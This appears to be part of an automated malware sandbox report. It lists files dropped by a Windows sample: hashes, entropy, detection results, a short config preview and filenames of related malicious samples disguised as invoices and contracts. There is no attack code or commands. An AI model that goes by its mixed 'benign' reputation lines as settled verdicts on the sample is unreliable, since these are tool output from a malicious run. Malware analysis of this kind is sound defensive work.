Size (bytes): 12288
Entropy (8bit): 5.805604762622714
Encrypted: false
SSDEEP: 192:VjHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZv0QPi:B/Qlt7wiij/lMRv/9V4bvr
MD5: 4ADD245D4BA34B04F213409BFE504C07
SHA1: EF756D6581D70E87D58CC4982E3F4D18E0EA5B09
SHA-256: 9111099EFE9D5C9B391DC132B2FAF0A3851A760D4106D5368E30AC744EB42706
SHA-512: 1BD260CABE5EA3CEFBBC675162F30092AB157893510F45A1B571489E03EBB2903C55F64F89812754D3FE03C8F10012B8078D1261A7E73AC1F87C82F714BCE03D
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: facturas gastos.exe, Detection: malicious
• Filename: Factura proforma.exe, Detection: malicious
• Filename: Contract-pdf.bat.exe, Detection: malicious
• Filename: Contract-pdf.bat.exe, Detection: malicious
• Filename: m4JIZpBl3o.exe, Detection: malicious
• Filename: UMOWA_20.BAT.exe, Detection: malicious
• Filename: JOWcitzTY4.exe, Detection: malicious
• Filename: dBMacros.exe, Detection: malicious
• Filename: dBMacros.exe, Detection: malicious
• Filename: PSAP_toolkit.exe, Detection: malicious
Reputation: moderate, very likely benign file

Process: C:\Users\user\Desktop\OW1i3n5K3s.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 28
Entropy (8bit): 4.110577243331642
Encrypted: false
SSDEEP: 3:iGAeTUHvn:lAeTUHv
MD5: F6A80CF0B011E1638B38D8EAA2A9629B
SHA1: 30AB7FEEC5D0A304ED9908ADD562601E3E7118C3
SHA-256: AB3B162F39F8FDBD8DD767791EC116E75DA198FCE6BABBA6E1677044678714D8
SHA-512: E1EC33696EA5086DEA0A52B577442B96124B71CD09999637185D114B7E5F313D455560C350F5A02FBA83C5A3A12A5234EEC995D0AF0CBF64471B3887E2AA2ED8
Malicious: false
Reputation: moderate, very likely benign file
Preview: [Access]..Setting=Disabled..

Process: C:\Users\user\Desktop\OW1i3n5K3s.exe
File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 688x713, components 3
Category: dropped
Size (bytes): 41501
Entropy (8bit): 7.917825064420613
Encrypted: false
SSDEEP: 768:XRqOmfmSUm9eMDhOmW+QlH6bDTrAqKwmn4+UwdNcKO6J:XYUh0OmSliQN4+Uu66J
MD5: 2DC989C33059D0EF3A31306CE6C46186
SHA1: 94B7EF506CFCFE807E1F9054921DCF9EF1DA5B34
SHA-256: BBA097FEC91F75D86F320B8D6CD15DC381ECF62AF8F169F57FF052F777A434C9
SHA-512: C56F253CA3E4403A5ADF7198677FEB11509C48869D8E57852C0166005E442D672FA21F0B408851200016897FF414955A93FE6E452AF88DDB64B1A3D9A50F43E5
Malicious: false
Reputation: low

Process: C:\Users\user\Desktop\OW1i3n5K3s.exe
File Type: CSV text
Category: dropped
Size (bytes): 500
Entropy (8bit): 4.2763099578021535
Encrypted: false
SSDEEP: 12:NpqQjiJpNcFaGRQsF0L63OTYhhillGRrSr5:Pkc2GU2lhhillkrSr5
MD5: 925580CB79AE485FEBA2A671F6718A80
SHA1: 8A908C17BF8AE8641AF92343F32A99F80D67EE59
SHA-256: 07F5975252C385C0F9F94EA354B0BCE1FC9220872E481340B0812236C8B00BDF
SHA-512: A55517D6FDA66695E8F9C1F7005AE6C6C391C607394577868CE75902C5E2358636C7862C0065A7A150752416657D11843174F8A1C4E634FA1CBBC1550A756EAD
Malicious: false